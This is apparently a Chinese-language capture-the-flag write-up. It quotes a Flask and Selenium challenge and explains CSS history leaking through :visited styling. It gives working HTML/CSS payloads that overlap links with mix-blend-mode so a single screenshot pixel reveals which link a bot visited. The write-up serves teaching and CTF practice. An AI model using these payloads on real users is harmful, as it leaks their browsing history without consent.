题目核心如下
# 读取flag并生成随机flag列表
flag = open('flag.txt').read().strip()
flags = [secrets.token_hex(16) for _ in range(1000)]
flag_access = secrets.choice(flags) # 随机选择一个flag作为访问凭证
gamble_chance = 3 # 赌博机会次数
@app.after_request
def add_header(response):
# 设置Referrer-Policy为no-referrer以防止CSRF
response.headers['Referrer-Policy'] = 'no-referrer'
return response
@app.route('/')
def list_flags():
# 列出所有可能的flag链接
response = ''
for i in flags:
response += f'<a href="/{i}">{i}</a><br>'
return make_response(response, 200)
driver.get('http://127.0.0.1:7382/')
driver.implicitly_wait(3)
driver.get('http://127.0.0.1:7382/'+flag_access)
driver.implicitly_wait(3)
driver.switch_to.new_window('tab')
driver.switch_to.window(driver.window_handles[0])
print('[-] Visiting URL', url, file=sys.stderr)
driver.get(url)
image = Image.open('screenshot.png')
screenshot_data = image.crop((0, 0, 1, 1)).tobytes()
response = make_response(screenshot_data, 200)
response.headers['Content-Type'] = 'image/png'
return response
CSS 历史泄露漏洞(也称为 History Leaking 或 Visit Status Leaking)是一种利用浏览器特性来探测用户访问历史记录的隐私泄露漏洞。其核心原理是 利用浏览器对已访问链接(
:visited)和未访问链接(:link)应用不同样式的能力,结合 JavaScript 或其他技术,推断用户曾经访问过哪些网站。
<style>
a:link { color: blue; }
a:visited { color: red; }
</style>
<a href="https://baidu.com.fake">示例链接</a>
在此挑战中,我们可以使用特殊字符
<style>
a {
position: absolute;
color: white;
mix-blend-mode: multiply;
}
a:visited {
color: red;
}
</style>
<a href="https://baidu.com.fake">█<-A5rZ Write that</a>
将多个样式重叠并显示为不同颜色
<!DOCTYPE html>
<html>
<head>
<style>
.container {
position: relative;
width: 50px;
height: 50px;
background-color: white;
}
a {
position: absolute;
top: 0;
left: 0;
font-size: 40px;
color: white;
mix-blend-mode: multiply;
}
a:nth-child(1):visited { color: #FF0000; }
a:nth-child(2):visited { color: #00FF00; }
</style>
</head>
<body>
<div class="container">
<a href="https://www.baidu.com.fake/?a=1">█</a>
<a href="https://www.baidu.com.fake/?a=2">█</a>
</div>
</body>
</html>
由此可以得出此题目的解决方案,即重叠n个flag提取其颜色细微差别。